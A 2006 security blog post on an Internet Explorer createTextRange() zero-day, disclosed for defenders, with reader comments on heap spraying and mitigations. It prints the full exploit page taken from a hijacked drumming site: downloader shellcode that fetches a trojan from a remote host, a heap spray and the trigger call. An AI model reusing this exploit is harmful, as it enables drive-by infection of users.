Security Information Vulnerability Research Security Blog

Internet Explorer createTextRange() 0day ITW Exploit

March 26th, 2006 by , Filed under: Microsoft, Virus, Web

in the past week there has been an internet explorer 0day vulnerability in-the-wild, openly exploiting users. most of these run shellcode which downloads a trojan horse to the exploited machine. the trojan horse downloaded with each exploited site varies.

according to a chat i just had with dan hubbard from websense, more than 200 web sites hosted this code exploiting users so far. secunia issued an advisory on it.

below is an example source from one of the web pages holding the exploit code. we strongly suggest you don’t run it.

<!doctype html public “-//w3c//dtd html 4.0 transitional//en”>
<html xmlns=”http://www.w3.org/tr/rec-html40″ xmlns:o =
“urn:schemas-microsoft-com:office:office” xmlns:w =
“urn:schemas-microsoft-com:office:word” xmlns:v =
“urn:schemas-microsoft-com:vml”><head>
<meta http-equiv=content-type content=”text/html; charset=windows-1252″>
<meta content=frontpage.editor.document name=progid>
<meta content=”mshtml 6.00.2800.1226″ name=generator>
<meta content=”microsoft word 10″ name=originator><link
xhref=”introduction_files/filelist.xml” mce_href=”introduction_files/filelist.xml” rel=file-list><!–[if gte mso 9]><xml>
<o:documentproperties>
<o:author>denis le marchant-smith</o:author>
<o:template>normal</o:template>
<o:lastauthor>denis le marchant-smith</o:lastauthor>
<o:revision>2</o:revision>
<o:totaltime>1</o:totaltime>
<o:created>2003-04-19t12:24:00z</o:created>
<o:lastsaved>2003-04-19t12:24:00z</o:lastsaved>
<o:pages>1</o:pages>
<o:company>evr</o:company>
<o:lines>1</o:lines>
<o:paragraphs>1</o:paragraphs>
<o:version>10.2625</o:version>
</o:documentproperties>
</xml><![endif]–><!–[if gte mso 9]><xml>
<w:worddocument>
<w:compatibility>
<w:breakwrappedtables/>
<w:snaptogridincell/>
<w:wraptextwithpunct/>
<w:useasianbreakrules/>
</w:compatibility>
<w:browserlevel>microsoftinternetexplorer4</w:browserlevel>
</w:worddocument>
</xml><![endif]–>
<style>@page section1 {size: 8.5in 11.0in; margin: 1.0in 1.25in 1.0in 1.25in; mso-header-margin: .5in; mso-footer-margin: .5in; mso-paper-source: 0; }
p.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
li.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
div.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
div.section1 {
page: section1
}
</style>
<!–[if gte mso 10]>
<style>
/* style definitions */
table.msonormaltable
{mso-style-name:”table normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:”";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:”times new roman”}
</style>
<![endif]–><!–[if !mso]>
<style>v\:* {
behavior: url(#default#vml)
}
o\:* {
behavior: url(#default#vml)
}
w\:* {
behavior: url(#default#vml)
}
.shape {
behavior: url(#default#vml)
}
</style>
<![endif]–><!–[if gte mso 9]>
<xml><o:shapedefaults v:ext=”edit” spidmax=”1027″/>
</xml><![endif]–></head>
<body lang=en-us style=”tab-interval: .5in” bgcolor=#000000 background=”background.gif”>
<div id=dot0
style=”visibility: hidden; width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”" mce_src=”" width=11> </div>
<div id=dot1 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot2 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot3 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot4 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot5 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot6 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<script language=javascript>
<!– hide code

/*
elastic trail script (by philip winston @ pwinston@yahoo.com, url: http://www.geocities.com/pwinston/)
script featured on dynamicdrive.com
for this and 100′s more dhtml scripts, visit http://dynamicdrive.com
*/

var ndots = 7;

var xpos = 0;
var ypos = 0;

// fixed time step, no relation to real time
var deltat = .01;
// size of one spring in pixels
var seglen = 10;
// spring constant, stiffness of springs
var springk = 10;
// all the physics is bogus, just picked stuff to
// make it look okay
var mass = 1;
// positive xgravity pulls right, negative pulls left
// positive ygravity pulls down, negative up
var xgravity = 0;
var ygravity = 50;
// resistance determines a slowing force proportional to velocity
var resistance = 10;
// stopping criterea to prevent endless jittering
// doesn’t work when sitting on bottom since floor
// doesn’t push back so acceleration always as big
// as gravity
var stopvel = 0.1;
var stopacc = 0.1;
var dotsize = 11;
// bounce is percent of velocity retained when
// bouncing off a wall
var bounce = 0.75;

var isnetscape = navigator.appname==”netscape”;

// always on for now, could be played with to
// let dots fall to botton, get thrown, etc.
var followmouse = true;

var dots = new array();
init();

function init()
{
var i = 0;
for (i = 0; i < ndots; i++) {
dots[i] = new dot(i);
}

if (!isnetscape) {
// i only know how to read the locations of the
// <li> items in ie
//skip this for now
// setinitpositions(dots)
}

// set their positions
for (i = 0; i < ndots; i++) {
dots[i].obj.left = dots[i].x;
dots[i].obj.top = dots[i].y;
}

if (isnetscape) {
// start right away since they are positioned
// at 0, 0
startanimate();
} else {
// let dots sit there for a few seconds
// since they’re hiding on the real bullets
settimeout(“startanimate()”, 1000);
}
}

function dot(i)
{
this.x = xpos;
this.y = ypos;
this.dx = 0;
this.dy = 0;
if (isnetscape) {
this.obj = eval(“document.dot” + i);
} else {
this.obj = eval(“dot” + i + “.style”);
}
}

function startanimate() {
setinterval(“animate()”, 20);
}

// this is to line up the bullets with actual li tags on the page
// had to add -dotsize to x and 2*dotsize to y for ie 5, not sure why
// still doesn’t work great
function setinitpositions(dots)
{
// initialize dot positions to be on top
// of the bullets in the <ul>
var startloc = document.all.tags(“li”);
var i = 0;
for (i = 0; i < startloc.length && i < (ndots – 1); i++) {
dots[i+1].x = startloc[i].offsetleft
startloc[i].offsetparent.offsetleft – dotsize;
dots[i+1].y = startloc[i].offsettop +
startloc[i].offsetparent.offsettop + 2*dotsize;
}
// put 0th dot above 1st (it is hidden)
dots[0].x = dots[1].x;
dots[0].y = dots[1].y – seglen;
}

// just save mouse position for animate() to use
function movehandler(e)
{
xpos = e.pagex;
ypos = e.pagey;
return true;
}

// just save mouse position for animate() to use
function movehandlerie() {
xpos = window.event.x + document.body.scrollleft;
ypos = window.event.y + document.body.scrolltop;
}

if (isnetscape) {
document.captureevents(event.mousemove);
document. = movehandler;
} else {
document. = movehandlerie;
}

function vec(x, y)
{
this.x = x;
this.y = y;
}

// adds force in x and y to spring for dot[i] on dot[j]
function springforce(i, j, spring)
{
var dx = (dots[i].x – dots[j].x);
var dy = (dots[i].y – dots[j].y);
var len = math.sqrt(dx*dx + dy*dy);
if (len > seglen) {
var springf = springk * (len – seglen);
spring.x += (dx / len) * springf;
spring.y += (dy / len) * springf;
}
}

function animate() {
// dots[0] follows the mouse,
// though no dot is drawn there
var start = 0;
if (followmouse) {
dots[0].x = xpos;
dots[0].y = ypos;
start = 1;
}

for (i = start ; i < ndots; i++ ) {

var spring = new vec(0, 0);
if (i > 0) {
springforce(i-1, i, spring);
}
if (i < (ndots – 1)) {
springforce(i+1, i, spring);
}

// air resisitance/friction
var resist = new vec(-dots[i].dx * resistance,
-dots[i].dy * resistance);

// compute new accel, including gravity
var accel = new vec((spring.x + resist.x)/mass + xgravity,
(spring.y + resist.y)/ mass + ygravity);

// compute new velocity
dots[i].dx += (deltat * accel.x);
dots[i].dy += (deltat * accel.y);

// stop dead so it doesn’t jitter when nearly still
if (math.abs(dots[i].dx) < stopvel &&
math.abs(dots[i].dy) < stopvel &&
math.abs(accel.x) < stopacc &&
math.abs(accel.y) < stopacc) {
dots[i].dx = 0;
dots[i].dy = 0;
}

// move to new position
dots[i].x += dots[i].dx;
dots[i].y += dots[i].dy;

// get size of window
var height, width;
if (isnetscape) {
height = window.innerheight + window.pageyoffset;
width = window.innerwidth + window.pagexoffset;
} else {
height = document.body.clientheight + document.body.scrolltop;
width = document.body.clientwidth + document.body.scrollleft;
}

// bounce off 3 walls (leave ceiling open)
if (dots[i].y >= height – dotsize – 1) {
if (dots[i].dy > 0) {
dots[i].dy = bounce * -dots[i].dy;
}
dots[i].y = height – dotsize – 1;
}
if (dots[i].x >= width – dotsize) {
if (dots[i].dx > 0) {
dots[i].dx = bounce * -dots[i].dx;
}
dots[i].x = width – dotsize – 1;
}
if (dots[i].x < 0) {
if (dots[i].dx < 0) {
dots[i].dx = bounce * -dots[i].dx;
}
dots[i].x = 0;
}

// move img to new position
dots[i].obj.left = dots[i].x;
dots[i].obj.top = dots[i].y;
}
}

// end code hiding –>
</script>

<p align=center>â </p>
<p align=center>â </p>
<p align=center><font face=fifthave><!–[if gte vml 1]><v:shapetype
id=_x0000_t170 coordsize = “21600,21600″ o:spt = “170″ path =
” m@0,0 l@1,0 m0,21600 l21600,21600 e” adj = “7200″><v:formulas><v:f eqn =
“sum #0 0 0 “></v:f><v:f eqn = “sum 21600 0 @0 “></v:f><v:f eqn =
“prod #0 1 2 “></v:f><v:f eqn = “sum 21600 0 @2 “></v:f><v:f eqn =
“sum @1 21600 @0 “></v:f></v:formulas><v:path o:connectangles=”270,180,90,0″
o:connectlocs=”10800,0;@2,10800;10800,21600;@3,10800″ textpathok = “t”
o:connecttype = “custom”></v:path><v:textpath on = “t” fitshape =
“t”></v:textpath><v:handles><v:h xrange=”0,10792″
position=”#0,topleft”></v:h></v:handles><o:lock shapetype=”t” text=”t”
v:ext=”edit”></o:lock></v:shapetype><v:shape id=_x0000_s1028
style=”width: 300.75pt; height: 120.75pt” type = “#_x0000_t170″ coordsize =
“21600,21600″ alt = “rock drumming” fillcolor = “blue” strokecolor =
“red” strokeweight = “12668emu” adj = “2158″><v:shadow on = “t” type =
“perspective” color = “#875b0d” opacity = “45875f” matrix =
“,,,.5,0,-476837158203125e-21″ origin = “,.5″></v:shadow><v:textpath
style=”font-family: ‘arial black’; v-text-kern: t” fitpath = “t” trim = “t”
string = “rock drumming”></v:textpath></v:shape><![endif]–><![if !vml]><img border=0 width=397 height=165
xsrc=”introduction_files/image001.gif” mce_src=”introduction_files/image001.gif” alt=”rock drumming” v:shapes=”_x0000_s1028″><![endif]></font></p>
<p align=center>â </p>
<p align=center>â </p>
<p align=left>â </p>
<p align=left><font color=#ffffff size=6>hi, my name is alex, and i have been
playing the drums since i was four years old and i have made this website to
show you types and tips on rock drumming. so in this website you will find a lot
of things you need to know to become a rock drummer. so now you can
explore my out of this world site. you can go to different parts of my website
by clicking on the words below.</font></p>
<p align=center>â </p>
<p align=center>â </p>
<p align=center>â </p>
<p align=center><img height=379 xsrc=”indexfiles/duhh.gif” mce_src=”indexfiles/duhh.gif” width=278
border=0></p>
<p align=center>â </p>
<p align=center>â </p>
<p align=center><a
xhref=”tips.htm” mce_href=”tips.htm”><font
face=catchup color=#00ff00 size=7>tips</font></a></p>
<p align=center>â </p>
<p align=center><a
xhref=”tricks.htm” mce_href=”tricks.htm”><font
face=”copperplate gothic bold” color=#00ff00 size=7>types of
drums</font></a></p>
<p align=center>â </p>
<p align=center>
<font size=7><a
xhref=”drumsets.htm” mce_href=”drumsets.htm”><font
color=#00ff00>drum sets</font></a></font></font></p>
<p align=center>â </p>
<input type=”checkbox” id=”blah”>
<script language=”javascript”>

shellcode = unescape( “%u4343%u4343%u1fe8%u0005%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u6300%u6c61%u2e63%u7865%u0065%u6f4d%u697a %u6c6c%u2f61%u2e34%u2030%u6328%u6d6f%u6170 %u6974%u6c62%u3b65%u4d20%u4953%u2045%u2e35
%u3130%u203b%6957%u646e%u776f%u2073%u544e %u3520%u302e%u0029%u6977%u696e%u656e%u2e74 %u6c64%u006c%u0000%u0000%u0000%u0000%u0000 %u0000%u03e8%u0000%u6e49%u6574%u6e72%u7465 %u704f%u6e65%u0041%u6e49%u6574%u6e72%u7465 %u704f%u6e65%u7255%u416c%u4900%u746e%u7265 %u656e%u5274%u6165%u4664%u6c69%u0065%u6e49 %u6574%u6e72%u7465%u6c43%u736f%u4865%u6e61 %u6c64%u0065%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u7468%u7074%u2f3a%u772f%u7777 %u662e%u6c75%u666c%u7461%u6b73%u6e69%u796e %u632e%u6d6f%u632f%u2e61%u7865%u0065%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u6058%ud08b%u33fc%u64c0%u408b %u8b30%u0c40%u708b%uad1c%u688b%u5208%u5252 %u5252%u5252%u5252%u5252%u5252%u79bb%ue741 %u5288%u0068%u0002%ue800%u0191%u0000%u8b5f %u03f7%u81f8%ue8c6%u0003%ub900%u0009%u0000 %ua4f2%ubb5a%u7959%u4773%u006a%u8068%u0000 %u6a00%u6a02%u6a00%u6800%u0000%u4000%ue852 %u0161%u0000%ue85a%u014b%u0000%u4289%u8304 %u0cea%u71bb%ue8a7%u52fe%u4ae8%u0001%ubb00 %uc21b%u3b10%ue85a%u012f%u0000%u0289%uc283 %u5210%ue850%u0133%u0000%u815a%ue8c2%u0003 %u8300%u09c2%u006a%u006a%u006a%u006a%uff52 %u5ad0%u08e8%u0001%u8900%u0842%u028b%u1bbb %u10c2%u833b%u1ec2%u5052%u04e8%u0001%u5a00 %ueee8%u0000%u8b00%u8bd8%u0842%uc281%u00a8 %u0000%u006a%u0068%u0000%u6a80%u6a00%u5200 %uff50%u5ad3%ucee8%u0000%u8900%u0842%u028b %u1bbb%u10c2%u833b%u2fc2%u5052%ucae8%u0000 %u8b00%u5af0%ub2e8%u0000%u8b00%u087a%uca8b %uc183%u5a0c%u5256%u5151%ue868%u0003%u5200 %uff57%u59d6%uc00b%u0774%u3983%u7500%ueb02 %u5a2a%u5251%ue852%u0087%u0000%uda8b%uc383 %u5e0c%u006a%u8b53%u0442%u4a8b%u510c%u5056 %u4fbb%u6a47%ue807%u007b%u0000%u595a%ueb5e %u5abd%ue85e%u005f%u0000%u428b%ubb04%uc776 %ued00%ue850%u0061%u0000%ubb5a%u4179%u88e7 %u6852%u0200%u0000%u50e8%u0000%u5f00%uf78b %uf803%uc681%u03e8%u0000%u09b9%u0000%uf200 %u5aa4%uc033%uf28b%uc681%u0491%u0000%ufe8b %uc783%uc710%u1047%u0044%u0000%u21bb%u05d0 %u57d0%u5056%u6a50%u5020%u5050%u5250%u12e8 %u0000%u6100%u81c3%ue8c2%u0003%u8300%u09c2 %uc283%u8334%u0cc2%u53c3%u5756%u458b%u8b3c %u0554%u0378%u52d5%u528b%u0320%u33d5%u33c0 %u41c9%u348b%u038a%u33f5%uc1ff%u13cf%u03ac%u85f8 %u75c0%u3bf6%u75fb%u5aea%u5a8b%u0324%u66dd %u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5fc5 %u5b5e%ue0ff”);

bigblock = unescape(“%u9090%u9090″);
slackspace = 20 + shellcode.length

while (bigblock.length < slackspace)
bigblock += bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length + slackspace < 0×40000)
block = block + block + fillblock;

memory = new array();

for ( i = 0; i < 2020; i++ )
memory[i] = block + shellcode;

var r = document.getelementbyid(‘blah’).createtextrange();

</script>
</body></html>

gadi evron,
ge@beyondsecurity.com.

Share
  • http://velatus.blogspot.com Ploceus Velatus

    IMHO the increasing certainty of such events happening is more and more a compelling reason for dungeoning the browser (possibly some more ‘untrusted’ apps) into a VM with only nonpersistent disk storage accessible for the OS in it.

    The challenge is to explain to an aunt Mary that she needs to sacrifice some of her favourite drag and drop tricks for something that does not seem to provide any immediately visible positive effect – but the news lately are helping with this respect.

  • Pingback: Just a Bump in the Beltway

  • Pingback: SecuriTeam Blogs » Counters say MSIE 0-day exploit is extremely popular

  • Pingback: ronniemadsen.dk | Internet Explorer “createTextRange()” kode-eksekvering

  • Pingback: Aviv Raff On .NET

  • http://prozacville.com prozacgod

    Am I reading this right? does this code generate “529490480″ bytes of data ??? I’m guessing the trick here is to flood the heap with copies of itself, and the bug is excercised when you try to call createTextRange on the input field. uhg sometimes I wonder how people figure this stuff out.
    This is a “shotgun” approach to causing the code to get ran- as there are many duplicate copies in memory and the hope is that it executes one of the copies – why don’t they have memory limits on javascripts ? I mean 1mb of allocated data for a javascript app might be sufficient enough ? (well this might neglect some mem hungry ajax apps)

  • sunshine

    I like the idea of giving users the ability to not just disable Java, but allow it only so much memory or not run it if…

  • sunshine

    Naturally, not all exploits are crude…

  • http://blogs.securiteam.com/index.php/archives/author/mattmurphy/ Matthew Murphy

    You have an idea, actually. My heap-fill, for instance, on the Windows Media Player plug-in exploit, uses several HUNDRED megabytes of virtual memory. It slows a mid-range to low-end machine to a crawl and very few legitimate scripts have a reason for that much memory. If a legitimate script DOES have a need for that much memory, it probably also has a need for a rewrite.

    NX will eventually make this technique useless, but in the interim, memory limiting would cripple it as well. It’s an obvious, sensible and yet unimplemented solution to this problem.

    Good comment.

  • Share







  • Categories


Security RSS Subscribe